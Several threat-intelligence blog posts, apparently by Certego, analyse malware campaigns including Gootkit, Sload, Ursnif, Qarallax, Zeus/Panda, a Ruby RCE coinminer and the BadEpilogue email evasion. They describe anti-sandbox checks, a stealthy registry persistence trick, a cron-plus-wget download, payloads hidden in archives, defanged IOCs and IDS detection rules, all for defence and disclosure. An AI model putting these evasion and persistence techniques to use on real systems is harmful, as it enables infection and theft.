It checks if the registry key “HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString” contains the word “Xeon”

it checks if the computer name is “7SILVIA” or “SANDBOX”, if the username is “CurrentUser” or “Sandbox” or if “sbiedll.dll” has been loaded.

it checks if “HKLM\HARDWARE\Description\System\VideoBiosVersion” contains the word “VirtualBox”

it checks “HKLM\Software\Microsoft\Windows\CurrentVersion\SystemBiosVersion” for the string “VBOX”

In the case one of this check fails, the program would execute a Sleep operation in a infinite cycle in the attempt to thwart automated sandbox execution.

After that, we encountered the implementation of a particular persistence mechanism that it seems Gootkit has been using for many months: it’s already documented in various blog posts, for ex. ReaQta blog.

Briefly, the infostealer generates a INF file with the same filename of itself.

Content of the INF file:

Then it creates 3 different registry keys (“Count”, “Path1” and “Section1”) inside “HKCU\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs” with the purpose to allow the threat to execute on reboot.

It seems that this technique was reported to be used only by Gootkit.

Famous security tools still can’t detect this mechanism even if it has been used for months.

For example, the famous SysInternal Autoruns tool, that should be able to show all the programs that are configured to run on system bootup or login, fails the detection of this persistence method.

Stepping through the code, we noticed that, at runtime, Gootkit decrypts the strings it uses with a custom algorithm to evade static analysis detection of anomalous behaviour.

It’s a combination of “stack strings”, XOR commands and the modulo operation.

An exhaustive explanation of the decryption routine can be found here:link

Skipping further, eventually there’s a call to “CreateProcessW” to start a new instance of Gootkit with the following parameter: --vwxyz

6.Stage 3: Check-in phase

Quickly we found out that executing the malware with the cited parameter allows us to skip all the previous anti-analysis controls to get into the part of the code that starts to contact the Command & Control Server.

The first check-in to home is done to the following URL via HTTPS:

As we can see from the image, many headers were added to the request to send different informations of the infected machine to the C&C Server.

In particular one of the headers caught my attention: “ X-IsTrustedComp”. Digging into the code we found that the value would be set to “1” if an environment variable called “crackmeololo” was found in the host, “0” otherwise.

That seems another “escaping” mechanism implementing by the author, probably to stop the infection chain for his own debugging purposes.

7.Last stage

The response that arrives from the previous connection contains the final stage of Gootkit, configured to work properly on the infected machine.

The malware dynamically loaded “RtlDecompressBuffer” call to use it to decompress the payload; then, it injected into an area of the current process memory.

Afterwards the flow of execution is transferred to the start of the injected code.

The final payload is a DLL file that is bigger than 5MB because it contains the Node.js engine which is probably needed to run some embedded javascript files. At this time we decided to stop our analysis and leave the rest to future work.

8.Additional findings

While debugging, we noticed that Gootkit does not check only if a parameter called “ --vwxyz” was passed to the command line. Also it checks if other 3 parameters:

Pretty strange thing. We haven’t found the malware to actively use these arguments yet. However, stepping through code we discovered that:

1 - the “--reinstall” command leaded the execution to some curious code. First, the malware used “CreateToolHelp32Snapshot” to retrieve a list of the current running processes.

Then, it iterated through the retrieved list via “ Process32FirstW” and “Process32NextW” with the aim to get a handle to the active “explorer.exe” instance.

At this point it killed “explorer.exe”. The following image shows the process list before the “TerminateProcess” command.

After having executed that command, we found that a new instance of the malware spawned as a child of “explorer.exe”.

What happened? We performed some tests and it seems that “ explorer.exe” was killed and then automatically restarted by “winlogon.exe”. Therefore “explorer.exe” accessed the keys involved in the persistence mechanism previously explained:

2 - the “ --service” command did not change the flow of execution with the exception of creating a new environment variable called “USERNAME_REQUIRED” and set it to “TRUE”.

Eventually we found that the final stage checks if the aforementioned variable exists.

3 - the “ -test” command just terminate the process. Indeed it’s a test.

9.Conclusions

We explored some of the functionalities of one of the most widespread Infostealers of these days, revealing new and old tricks that is using to remain undetected as much time as possible.

Certego is actively monitoring every day threats to improve our detection and response methods, continuously increasing the effectiveness of the incident response workflow.

PS: Let us know if you liked this story and feel free to tell us how we can improve it!

Hash

GLS_Notifica.js
5ed739855d05d9601ee65e51bf4fec20d9f600e49ed29b7a13d018de7c5d23bc
gootkit 1st stage
e32d72c4ad2b023bf27ee8a79bf82c891c188c9bd7a200bfc987f41397bd61df 
gootkit 2nd stage
0ad2e03b734b6675759526b357788f56594ac900eeb5bd37c67b52241305a10a 
gootkit DLL module

Athor:

Matteo Lodi, Threat Intelligence Lead Engineer

Sload hits Italy. Unveil the power of powershell as a downloader

Matteo Lodi, Threat Intelligence Team Leader — Thu, 22 Nov 2018 23:00:00 GMT

Hi everyone, here is Matteo Lodi, Threat Intelligence Analyst in Certego.

Recently, we saw a particular new spam campaign targeting italian users with the focus of delivering a downloader known as Sload.

Nowadays, attackers are trying harder and harder to make difficult the analysis and the detection. The most common tool misused in this way is Powershell: it's installed by default in every recent version of Windows and is commonly used to perform administrator tasks.

The infection chain

Let's dig in the infection chain:

1. A user receives an email with subject "<TARGET_COMPANY_NAME> Emissione fattura <random_number>" containing a reference to a fake invoice.

The user is tricked to click on the malicious link that points to a randomly generated domain hosted with HTTPS in 91.218[.]127.189. The following is an example:

2. Once downloaded, if the user opens the archive, it would find two files. The first one is a legit image, while the second one is a .lnk file. We have already seen the misuse of shortcut files with powershell to perform the download of malicious samples. But this time it seemed different: in fact, the .lnk points to the following command:

3. Where is the download? At first glance, that seemed very strange: what is the aim of this execution? After having analyzed the command, the trick was clear. The attackers wants to call "Invoke-Expression" command to run a string hidden inside the zip itself!! But where?

As we can see in the following image, at the end of the original downloaded zip file we can see readable strings that are the real first stage downloader!!

The zip file is still a legit and correctly working archive! Powershell commands are written after the EOCD (End of central directory) which determines the end of a zip file.

This clever trick can deceive many signatures-based detection tools.

4. The extracted command is the following:

The result is the download and the execution of another powershell script from a server hosted in 185.17[.]27.108. We saw different domains used but, in the last week, the Dropzone IP never changed. Also, we noted that the CnC server was blocking requests without the "Microsoft BITS/7.5" User-Agent to prevent unwanted download by non-infected machines.

This script was very well detected by antivirus engines as you can see in the following image!

How funny was I? Static analysis is completely useless in such cases.

Going forward, the malware drops the following items before deleting itself:

Therefore it registers a task called "AppRunLog" to maintain persistence

6. At the end, it calls the registered task. This will execute the dropped Visual Basic Script file that, in turn, will execute the dropped Powershell script:

This script parses arguments and it won't execute properly in case they are not what it expects. It needs the numbers from 1 to 16 as arguments because, in fact, they are the key to decrypt the last stage.

7. The final payload is decrypted from the "config.ini" file and is called with "Invoke-Expression". It's loaded directly in memory: this makes very difficult for antivirus products to detect the threat. At the moment, this execution method is widely known as "fileless" because, indeed, the malware is never written on disk.

The payload is the last (finally) powershell script: it is the real Sload downloader which performs various malicious steps that were already explained in details in the article written by Proofpoint.

In few words, Sload can:

Load external binaries
Take screenshots
Update configuration and CnC servers
List running processes
Detect Outlook usage

The variant we spotted in the last week uses the following CnC domains, which resolve in the same IP used by the second downloader stage (185.17[.]27.108)

However, we expect that this configuration won't last long, because, as we said before, Sload is able to update his CnC servers at any time.

Conclusion We had a fantastic journey that made us understand, hopefully, how powerful can be Powershell and how attackers are misusing this tool to evade analysis detection.

We analyzed 5 different powershell scripts and that was only the "downloader" phase of the infection.

In case of a successfull one, Sload was seen to download known malware like Ramnit, Gootkit, DarkVNC or Ursnif (reference: Proofpoint). At that stage the threat would be really important.

Certego is monitoring the campaign and it's updating its signatures to correctly detect possible infections.

IOC

Mailsnif

Thu, 19 Apr 2018 22:00:00 GMT

Nelle ultime settimane i sistemi di monitoraggio Certego hanno rilevato un significativo aumento nella diffusione del malware Ursnif.

Questo aumento è dovuto al particolare sistema di spear phishing recentemente impiegato per diffondere tale malware. Questo sistema, già segnalato lo scorso Novembre da Barkly e ripreso questo mese da Libraesva e Metis, si basa su una tecnica che possiamo definire di thread injection: la vittima si vede recapitare un messaggio email come risposta ad una precedente conversazione con un suo contatto, con tanto di citazioni dei messaggi precedenti e firma del mittente, in cui si invita l'ignaro e fiducioso destinatario ad aprire il documento allegato.

Come è facile immaginare, l'allegato in questione, spesso in formato doc di Microsoft Word, in questione contiene in realtà delle MACRO il cui scopo è scaricare da un server remoto una copia del malware Ursnif e così infettare un altro host.

Come anticipato, i vantaggi di questa tecnica di phishing sono evidenti: il rapporto di fiducia che esiste tra le utenze riduce l'attenzione della vittima finale quando questa riceve il documento malevolo. Esiste però anche un altro vantaggio rispetto allo spam "tradizionale": si vengono a colpire esclusivamente utenti attivi e, contemporaneamente, si aggirano i sistemi di raccolta passivi dello spam.

Tuttavia, finora non si avevano prove certe su come operasse il malware per recuperare tali informazioni. Essendo Ursnif un malware la cui principale funzione consiste nel manomettere le connessioni verso i siti bancari (session hijacking), era abbastanza facile supporre che effettuasse la stessa operazione verso i client di posta e/o le webmail; così da raccogliere alcune conversazioni e inviare le mail di phishing sopra descritte. Il malware è così riuscito a trasformare le sue vittime in complici, per quanto ignari, della sua propagazione.

In questi giorni è però emerso un fatto interessante. Durante la sua attività di analisi di un esemplare di Ursnif, il ricercatore noto come JAMESWT ha individuato su uno dei server utilizzati per distribuire gli eseguibili del malware una cartella contenente numerose informazioni relative ad account di posta.

L'analisi del contenuto della cartella indicata da JAMESWT ha portato alla luce una serie di file testuali in cui erano presenti accurate informazioni per accedere a diversi account di posta compromessi. Per ciascuna utenza sono riportati: nome utente, password, indirizzo del server email e protocollo di accesso.

Poco tempo dopo la segnalazione, i file con le credenziali compromesse sono stati rimossi dal server.

Questo rilevamento ci permette di affermare che, per quanto riguarda le campagne attualmente in atto, i responsabili della diffusione del malware Ursnif abbiano completo accesso e disponibilità delle caselle di posta delle loro vittime, senza alcuna necessità di utilizzare bot o strumenti di intercettazione. Inoltre, espone tutti i contatti delle vittime ad attacchi di spear phishing tramite thread injection, come quelli sopra descritti.

Analizzando alcune mail appartenenti a queste campagne in cerca di anomalie, abbiamo rilevato che il bounce address non corrispondeva con l'indirizzo presumibilmente compromesso. Il controllo degli header Received delle mail ha confermato che il server da cui venivano trasmesse queste mail apparteneva all'organizzazione del bounce address. In base a questo possiamo dire che, al momento in cui scrivamo questo articolo, gli account compromessi non vengano utilizzati per inviare attivamente le mail di phishing. Molto probabilmente si tratta di una scelta ponderata da parte degli attaccanti, in modo da aggirare eventuali filtri in uscita da parte dei server delle loro vittime: infatti un errore di consegna potrebbe allarmare l'utente (o il responsabile della gestione della mail aziendale) che andrebbe quindi in cerca di anomalie, utilizzando invece mail server di una terza parte si evitano questi "inconvenienti".

Il miglior modo per difendersi da questo genere di attacchi è non abilitare in alcun caso le MACRO di qualunque documento ricevuto via mail (o tramite link ricevuti via mail). È comunque importante possedere, e mantenere aggiornato, un buon sistema di difesa sia perimetrale (antispam, firewall) che locale (antivirus), così da ridurre il rischio e contrastare eventuali infezioni.

New spam campaign delivering evasive malware

Matteo Lodi, Threat Intelligence Team Leader — Thu, 18 Jan 2018 23:00:00 GMT

Hi everyone, here’s Matteo Lodi, member of the Incident Response Team.

Today, we want to talk about a new threat we have just detected while analyzing the alerts generated by our platform.

Everthing started from the analysis of the following ET Signature ET TROJAN Windows executable base64 encoded.

At the first glance, it seemed that there were no executables downloaded.

That was quite strange. A deeper analysis showed that many hosts belonging to one of our customers downloaded a zip file from different domains but the same IP.

Here we are! We could guess that a new spam campaign has just started and many domains are being used to deliver a malware.

So, we started to analyze “Nuovo documento 2018.zip” to understand what kind of threat it is. Once uncompressed, we found inside a batch file called “Nuovo documento 2018.bat”.

The first two lines are the following:

Oh, let’s see what it is:

A poorly trained eye could have just said to himself: “Well that’s just an image, this batch is harmless”

But it wasn’t. In fact, the batch file was other 200 empty lines long and, at the end of it, there were the following statements:

So we found that it’s a downloader. It tries to get a fake php file that, indeed, it’s the base64 encoded executable reported by our platform.

We also noticed the CnC server has implemented a domain whitelist and it allows to download the malware only by the IPs it sent the phishing campaign. If someone tries to get the zip file connecting from other IPs, the site would return a xml empty page.

First VirusTotal analysis wasn’t really satisfying because there was no indication about the malware classification, enhancing our hypothesis about a new spreading threat:

Then, we sent the malware to our threat intelligence platform for further analysis.

External and internal feed couldn't identify with ease what kind of malware it is.

In fact, as already said, the threat is new: manual or automatic analysis didn't get a perfect indication. However, this kind of anti-VM and anti-debugging abilities could lead us to guess that it's an infostealer, probably a Ursnif variant.

Meanwhile, we alerted the customer: to contain the threat, we worked together to find the mail responsible of the infection. The mail was the following one:

So, as already seen in older phishing campaigns, users have to pay attention to emails with “pending invoice” or similar as subject and they haven’t to get tricked to click to the link provided after panicking about a fake unpaid bill.

Conclusion

We found a new spam campaign delivering an evasive infostealer, targeting at least Italian users

IOC

185.61.152[.]71

URL

cloudblueprintprogram[.]com/images4.php (Malware)

MD5

c7bfa2bb1a027d6179eaa5d48465fad3 images4.php (malware base64 encoded)
a09916eb46ff94a89f09a072100eb3eb Nuovo documento 2018.bat (dropper)```

Ruby RCE pushing Monero Coinminer

Wed, 10 Jan 2018 23:00:00 GMT

Our threat intelligence platform has been logging a huge spike in ruby http exploiting since yesterday (10 January) at 23:00.

The exploit has been trying to leverage a fairly old CVE (CVE-2013-0156) that allows remote code execution. The following public Emerging Threat signature cover the exploit:

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET CURRENT_EVENTS Possible CVE-2013-0156 Ruby On Rails XML POST to Disallowed Type YAML"; flow:established,to_server; content:"POST"; http_method; content:"|0d 0a|Content-Type|3a 20|"; pcre:"/^(?:application\/(?:x-)?|text\/)xml/R"; content:" type="; http_client_body; nocase; fast_pattern; content:"yaml"; distance:0; nocase; http_client_body; pcre:"/<[^>]*\stype\s*=\s*([\x22\x27])yaml\1/Pi"; reference:url,groups.google.com/forum/?hl=en&fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ; classtype:web-application-attack; sid:2016175; rev:3; metadata:created_at 2013_01_09, updated_at 2013_01_09;)

The attacker has been sending the following data through a POST request:

The attacker sends a base64 encoded payload inside a POST request in the hope that the ruby interpreter configured on the server will execute it. By unpacking the payload we obtained the following code:

This is a very simple bash script that adds a new entry in the crontab of the host. The cronjob is executed once per hour (notice the number 1: it means every first minute of every hour) and it downloads the file robots.txt via wget. The file is piped through bash, so most probably it’s a text file containing a shell script. By manually downloading it we can confirm our hypothesis. This is the file content:

The script checks if there is a a coinminer already in execution and, if not, it downloads the coinminer from hxxp://internetresearch[.]is/sshd (or sshd.i686), launching it afterwards. We found the coinminer used is the linux version of XMRIG Cpu Miner: https://github.com/xmrig/xmrig

IOC


185.130.104[.]17 80 GET hxxp://internetresearch[.]is/robots.txt (x86-64 XMRIG coinminer download) 

185.130.104[.]17 80 GET hxxp://internetresearch[.]is/robots.txt (i686 XMRIG coinminer download) 

185.130.104[.]17 80 GET http://internetresearch[.]is/robots.txt (Sending system Info in User Agent) 

XMRIG Executable:
MD5:  761f5cfd0a3cddb48c73bc341a4d07a9
FileSize: 723080 bytes

Nearly undetectable Qarallax RAT spreading via spam

Matteo Lodi, Threat Intelligence Team Leader — Mon, 04 Dec 2017 23:00:00 GMT

Hi everyone, here's Matteo Lodi, member of the Incident Response Team.

This time i want to talk about a new threat we detected randomly while analyzing the alerts generated by our platform.

Everything starts from the analysis of a little and alone level 2 ET signature called "ET PRO POLICY DNS Query to .onion proxy Domain (onion . casa)".

At the beginning, the only evidence we got from the traffic analysis are many DNS queries followed by 4 HTTPS contacts to the following weird domain: vvrhhhnaijyj6s2m[.]onion[.]casa

We found that onion.casa is a proxy used to access to hidden services behind the renowned TOR network. In details, if we visit the site, we can find that the domain in question hosts a site which claim to sell a malware known as Qarallax.

Qarallax is a RAT (remote access tool) and infostealer. This malware was born from an open-source software known LaZagne. At this time, this artifact let an attacker to execute different kinds of operations inside the infected machine:

Catch mouse movements and clicks
Catch keyboard inputs
Record the output of the webcam and of the screen
Find and steal every kind of credential stored inside the machine

There's a group called Quaverse which claim to be the R&D behind this threat, constantly working to evolve and upgrade the malware. Their objective is to sell the agent as a RaaS (RAT as a Service).

The file is a JAVA application that runs on operating systems with JAVA Runtime Environment (JRE) installed. It runs silently in the background without any indication to the user.

At this time, we had no evidence that the host that contacted the suspicious domain is infected, but we are strongly suggested to investigate further to understand if this is a real threat.

We tried to look for some intelligence feeds from the internet, looking if someone else has found some useful infos about the domain in question. At the beginning, we checked from Google, Twitter and Reverse but we didn't found anything. Then, checking VirusTotal, we found that they list the following URL as a malicious one: hxxps://vvrhhhnaijyj6s2m[.]onion[.]casa/storage/cryptOutput/0.92915600%201512026521.jar

Wow, only 3 hits and no sample uploaded to VT. However, at that time, we got an idea about what the SSL connections did: downloading a .jar file containing, with high probability, the malware.

Meanwhile, we contacted the client and, luckily, the host infected was a virtual machine that got reverted to a clean state and the AV Agent detected and stopped the execution of the malware.

Afterwards, the real questions were:

how did they get the malware?
was the attack targeted or opportunistic?

The day after, inside our spamtrap, we retrieved a sample called "IMG6587JPG..jar", identified as malicious (8.2/10 score) by our sandbox. The first thing where we put our attention was the traffic this sample generated towards the suspicious domain.

That's it! Probably we found the malware our client got and, luckily, it came from a normal email spam tricking the user to open a fake image containing the infostealer.

Fun fact was that only 4 AV engines detected it. After 4 hours, finally, some other antivirus products started to identify that threat as malicious (15).

We said that to our client who could find the email that was the infection vector and send it to us. The Qarallax variant was almost identical to the one we caught just some minutes before. The only thing that changed was the email body (different language, from english to italian) and the name of the sample: PAGAMENTO.jar. Even in this case, the first time we send the sample to VT, only few antivirus were able to identify it.

Update

We detected some new similar samples. The malware capabilities are the same as before. The biggest difference is the proxy used to contact the C&C server: from onion[.]casa to onion[.]top. We want to underline that the threat is evolving day by day: every new sample we get to analyze is almost undetected by every kind of AV engine.

Conclusion

We found a new spam campaing delivering a RAT malware, nearly undetectable by IDS Signatures or AV engines.

IOC

Domains:

vvrhhhnaijyj6s2m[.]onion[.]top
vvrhhhnaijyj6s2m[.]onion[.]top

RAT samples (MD5):

f441dc0388afd3c4bca8a2110e1fa610
682f0260cd0bb8716d32485eebfe1d31
cb9da672613decdc800849a45f21c0b8
d77cfa2b68c744f3ba62f2e49a598ffa
d9adbb40a0ae557c5bf1d2dd2f85409d
42ecb562506ec1734cc291c0092753c5
702f6c5856591accb8cdd4bcfc46e114

A pesca con Cedacriall

Thu, 22 Jun 2017 22:00:00 GMT

Da Aprile 2017 le piattaforme di threat intelligence di Certego hanno iniziato a seguire alcune particolari campagne di spam volte a diffondere trojan bancari su target italiani.

La particolarità di queste campagne è di utilizzare come download zone per i propri payload siti aventi sempre cedacriall come dominio di secondo livello e certificati gratuiti firmati dal progetto Let’s Encrypt.

Il malware: Zeus/Panda

Panda (o Zeus/Panda) è il nome con cui viene comunemente indicata una variante del malware bancario Zeus.

I malware appartenenti a questa famiglia sono solitamente utilizzati per compiere attacchi di tipo Man in the Browser, una volta infettato un host il malware prende il controllo dei browser installati registrando ogni dato immesso e/o alterando le sessioni di accesso ad alcuni siti.

Inoltre questa famiglia di malware agisce come una botnet: ogni macchina infetta è collegata ad una serie specifica di server di Comando e Controllo (CnC). Il malware periodicamente contatta il proprio server CnC, comunicandovi le informazioni raccolte e richiedendo nuove configurazioni su cosa monitorare.

Le campagne

04/04/2017 - Fattura Amministrazione

La prima diffusione registrata dai nostri sistemi risale al 4 Aprile di quest’anno, descritta in questo articolo su My Online Security. Le mail di phishing rilevate avevano i seguenti oggetti:

fattura del 04\04\2017
Invio fattura/ordine
ordine 04.04.2017
fattura del 04.04.2017

Le mail in questione avevano contenuti simili al seguente:

al pagamento della fattura in allegato alla presente.
Grazie
Confidando nel Vostro sollecito riscontro, inviamo i nostri distinti saluti.
Amministrazione

Tutte le mail rilevate avevano i medesimi allegati, due documenti Word

pagina 1.doc a7960e5a86d7aee713f3c0fcee6c96e4
pagina 2.doc 5c66df3788a08c83a97a1074006e09e8

Questi documenti effettuavano il download di una versione di Zeus/Panda dalla seguente risorsa:

hxxps://cedacriall[.]review/eli.exe

La particolarità di questo download è di avvenire abusando un certificato gratuito fornito dall’organizzazione Let’s Encrypt.

23/05/2017 - Fattura Maggio e F24

La seconda diffusione, descritta in questo articolo su My Online Security, utilizza due temi differenti nella stessa giornata.

Fattura Maggio

Il primo tema riguardava una presunta fattura relativa al mese di Maggio, inviava mail con i seguenti oggetti:

fatt di maggio XXXXXX
richiesta fattura n. XXXXXX
fatt di maggio XXXXXX
Invio fattura XXXXXX
richiesta fattura n. XXXXXX

Nelle mail si usava poi un contenuto di questo tipo:

Le fatture n. XXXXXX del 23/05/2017 sono in formato WORD per essere visualizzate e stampate. 
Il presente invio SOSTITUISCE INTEGRALMENTE quello effettuato in modo tradizionale a mezzo servizio postale. E’ quindi necessario GENERARNE UNA STAMPA e procedere alla relativa archiviazione come da prassi a norma di legge. La stampa da parte sua dei documenti fa fede ai fini fiscali e contabili.Confidando nel Vostro sollecito riscontro, inviamo i nostri distinti saluti.

In questo caso l’allegato delle mail era il seguente documento Word:

fattura.05.doc    3fa667c19c7e6cfc41dedba1e282bbd3

In questo caso sembra sia stato fatto un errore di compilazione del downloader, poiché il file richiedeva la seguente URL errata

ehtps://cedsbmurriall[.]info/polo.exe

Tuttavia sembra che il dominio dovesse essere cedacriall[.]info.

F24

Il secondo tema riguardava invece il modulo fiscale F24, con i seguenti oggetti

pagamento F24
PAGAMENTO f24
copia del pagamento
pagamento2017-05
pagamento del bonifico

Le mail questa volta sono molto brevi e sintetiche:

Buon pomeriggio,
IN ALLEGATO DELEGA DEL PAGAMENTO F24
Cordiali saluti

Questa volta l’allegato era il seguente documento Word

pagamento F24.doc    d9c79044972d8fe0e857a05b016772f1

Il quale tentava di scaricare sempre una versione di Zeus/Panda dalla seguente risorsa:

hxxps://cedacriall[.]info/polo.exe

Anche in questo caso si utilizzava un certificato di Let’s Encrypt

15/06/17 - Fattura proforma

La terza diffusione, descritta in questo articolo su My Online Security, utilizzava i seguenti oggetti:

fattura
fattura corretta
Fattura n.06/17
fattura insoluta
fattura nuovo iban!

Ancora una volta le mail arrivano con un testo molto semplice e ben scritto:

Buongiorno
ti invio in allegato la fattura proforma. Aggiornami quanto prima.
Grazie

Questa volta cambia il formato del downloader, viene usato un file Excel:

Fattura n.XXXXX del 15-07-2017.xls    a05ecf6f1cd0ae183bc8514efb801a65

Che tentava di scaricare ancora una volta Zeus/Panda dalla seguente risorsa:

hxxps://cedacriall[.]review/1ulxomeobigohiwhufovi.exe

Lo stesso sito e lo stesso certificato visti nella campagna prima campagna di Aprile.

##20/06/17 - Fattura BRT

La quarta diffusione finge di essere una richiesta di fatturazione di un corriere italiano. In questo caso viene utilizzato un unico formato per l’oggetto in tutte le mail:

Fattura BRT S.p.A. n. XXXXXX del 20/06/17

In questo caso vediamo una mail un po’ più elaborata, in modo da ricordare le vere mail della compagnia:

Gentile cliente,
come da sua richiesta le inviamo in allegato la fattura in oggetto in formato xls.
Sarà vostra cura la stampa su supporto cartaceo (risoluzione del 04/07/2001 n. 107).
Cordiali saluti
BRT S.p.A.
Il presente messaggio è diretto esclusivamente al suo destinatario e può; contenere informazioni di natura riservata. Chiunque lo abbia ricevuto per errore è pregato di darne notizia immediatamente al mittente e di distruggere la copia pervenutagli. Qualsiasi altro suo utilizzo è vietato.
This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original Any other use of the email by you is prohibited.

L’allegato è nuovamente un file Excel, in due versioni:

Fattura_XXXXXX.xls 7c09d53a7929c3bdb3dd418c6e3161f6
3D fattura XXXXXX.xls 4fdeccecfa0fe4532a569e2060be74d5

Il payload finale della prima versione risulta sempre essere una variante di Zeus/Panda, reperito dalla seguente risorsa:

hxxps://cedacriall[.]win/1aqalpiniahelfuimoksa.exe

Ancora una volta vediamo l’uso di un certificato Let’s Encrypt

Mentre il secondo downloader recupera lo stesso malware dalla seguente risorsa:

hxxps://cedacriall[.]faith/1aqalpiniahelfuimoksa.exe

In questo caso però lo spammer non ha creato un certificato ad hoc per il dominio, che risponde con lo stesso certificato del primo sample:

C21/06/2017 - Fattura CSA

La quinta campagna registrata utilizza nuovamente una dichiarazione generica di fattura

fatt n. XX del 21 giugno 2017
f-ra n. XX del 21 giugno 2017
fattura n. XX del 21 giugno 2017

Le mail sono estremamente semplici e brevi

Buongiorno, allego alla presente la fattura in oggetto cordiali saluti

Nuovamente viene utilizzato un downloader Excel

2017 - fatt. XX.xls dbb09aa8e0131b3c246f893705318254
fatt. - 2017 n.XX.xls b7995a448008cb5ed570c4ad96f97b56

Il payload finale risulta sempre essere una variante di Zeus/Panda, reperito dalla seguente risorsa:

hxxps://cedacriall[.]download/index.gif

22/06/2017 - Fattura del 22/06

Abbiamo inoltre rilevato una sesta campagna, che utilizza ancora la dicitura generica di fattura

Invio Fattura
Fattura del 22/06/17
Fattura XXX del 22/06/17
Fattura numero XXX del 22/06/2017

Il testo delle mail è ancora molto semplice e breve

Alleghiamo fattura in formato XLS.
Ufficio Amministrazione

Il vettore d’infezione è ancora un file Excel

3D FATT-06-2017-689.xls 8b1436cca913772d6ec53deb3e2aecba

Tuttavia questa volta il dominio sembra pseudo casuale, anche se la struttura dell’URL è molto simile alle precedenti

hxxps://3eee22abda47[.]bid/index.frt

E viene ancora utilizzato un certificato Let’s Encrypt

Anche se potrebbe sembrare scollegata, questa campagna pare essere comunque legata alle precedenti, infatti il server è lo stesso della campagna del 21/06. Infatti richiedendo la medesima URI al dominio utilizzato in tale campagna otteniamo lo stesso file.

Prevention & Remediation

Le mail di spam e phishing, al momento, sono i maggiori mezzi di diffusione del malware, questo perché sfruttano uno dei fattori più difficili da controllare: l’elemento umano.

Un buon sistema di filtraggio della posta elettronica è un elemento importante per ridurre le probabilità che gli utenti ricevano email malevole. Tuttavia è bene sensibilizzare periodicamente gli utenti al fenomeno dello spam, ricordando quanto segue:

Non aprire mai né link né allegati ricevuti via mail da sconosciuti o non attesi
Non abilitare mai le macro su documenti giunti via mail
In caso di dubbi o sospetti sulla provenienza di una mail contattare l’ufficio IT o un responsabile per ulteriori controlli.

In caso si abbia comunque aperto un allegato simile a quelli sopra citati la prima cosa da fare è contattare il proprio ufficio IT per fare analizzare la macchina con appositi strumenti; è altresì consigliato il cambio di tutte le credenziali utilizzate sull’host potenzialmente infetto. Se il pc è stato utilizzato per accedere a siti di natura finanziaria è bene anche verificare da una postazione sicura eventuali transazioni anomale.

# Possibili conclusioni

L’utilizzo di domini cedacriall e l’uso della lingua italiana fanno presupporre che il bersaglio di queste campagne possano essere alcuni istituti bancari italiani.

D’altronde è possibile che il dominio sia utilizzato esclusivamente come convenzione dagli attaccanti per distinguere i download da parte dei target italiani.

Resta il fatto che siamo davanti ad un abuso abbastanza evidente del progetto Let’s Encrypt, nato per favorire la sicurezza delle connessioni e del web, che però al momento non è ancora riuscito a stabilire delle politiche di controllo efficaci per stabilire la natura dei richiedenti dei certificati.

Basta fare una breve ricerca sul web per scoprire che non si tratta di un singolo (e ripetuto) caso di abuso.

Per quanto il web abbia bisogno di sicurezza non si può trascurare il processo di verifica che ogni Certification Authority dovrebbe essere tenuta a compiere nei confronti di chi vi fa richiesta per un certificato digitale.

IOC

Firma IDS

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"CERTEGO TROJAN Zeus/Panda 
SSL download (cedacriall.TLD)"; flow:established,from_server; content:"|55 
04 0a|"; content:"|0d|Let|27|s Encrypt"; distance:1; within:14; fast_pattern; 
content:"cedacriall"; nocase; classtype:trojan-activity;)

MD5

Downloader

a7960e5a86d7aee713f3c0fcee6c96e4
5c66df3788a08c83a97a1074006e09e8
3fa667c19c7e6cfc41dedba1e282bbd3
d9c79044972d8fe0e857a05b016772f1
a05ecf6f1cd0ae183bc8514efb801a65
7c09d53a7929c3bdb3dd418c6e3161f6
4fdeccecfa0fe4532a569e2060be74d5
dbb09aa8e0131b3c246f893705318254
b7995a448008cb5ed570c4ad96f97b56
8b1436cca913772d6ec53deb3e2aecba

Malware

220e79a5d9dc77b9c84b30245fc7064b
42d84d98b4db642836bd70abcd115750
a73713c62f8726e6825752a1ed356ac9
b611fb923b79921911f7bd4a7969ead4
c191d6dbca9759d63d0ddc1b9352a093
ed554c9d86f0b84db616564f41d746cb
458ffe4f16ae495a83659836a532fbeb

Domini

cedacriall[.]info
cedacriall[.]win
cedacriall[.]review
cedacriall[.]faith
cedacriall[.]download
3eee22abda47[.]bid

Indirizzi IP

119.28.82,241
13.59.248,84
34.201.210,159
52.34.34,57
52.91.231,178

BadEpilogue: The Perfect Evasion

Tue, 20 Sep 2016 22:00:00 GMT

Starting from May 2016, Certego Threat Intelligence platform has been detecting multiple viral spam campaigns using a new evasion technique. These attacks are able to hide malicious attachments inside a specific area of the MIME/Multipart structure and to avoid Content Filtering controls.

Certego has also verified that few of the most common email clients and Web Mail services, using a different way of rendering the MIME/Multipart structure, are able to identify and extract the attachment, resulting in a Malware Evasion technique that we called BadEpilogue.

Analysis of the evasion technique

The picture at the top of the page shows a snippet of the source of a malicious email message.

Rows from 53 to 57 contain the end of the HTML message, while the attachment is located within an area that RFC2046 defines as Epilogue of a MIME/Multipart message, right after the final boundary of the Multipart message located at line 59 ending with the double “-” character.

According to RFC 2046, the message’s epilogue should not contain any useful text and, in particular, it should be ignored by MIME-compliant software:

NOTE: These "preamble" and "epilogue" areas are generally not used because of the lack of proper typing of these parts and the lack of clear semantics for handling these areas at gateways, particularly X.400 gateways. However, rather than leaving the preamble area blank, many MIME implementations have found this to be a convenient place to insert an explanatory note for recipients who read the message with pre-MIME software, since such notes will be ignored by MIME-compliant software.

In the attack, right after the closing boundary of the MIME/Multipart message and at the beginning of the Epilogue area, there is a new boundary (see line 61) that starts another Multipart section containing the malicious attachment.

Certego verified that many libraries used in Antispam and Antivirus systems to extract and analyze email attachments are unable to detect files hidden in the Epilogue area. On the other hand, popular email clients such as Outlook, Thunderbird and Evolution and also Web Mail services are able to detect the attachment and to show it to the user resulting in a new malware evasion technique.

Responsible Disclosure Policy

Certego decided to report this evasion technique to the developers of the email clients impacted by BadEpilogue. At the same time, we informed the vendors of major Antispam systems so that some of their Content Filters are ignoring attachments hidden in the Epilogue area.

So, we reported the technique to Microsoft and Mozilla. Microsoft has just released a patch for their email client in their last Security Bulletin (CVE-2016-3366 in the security bulletin MS16-107) fixing the vulnerability.

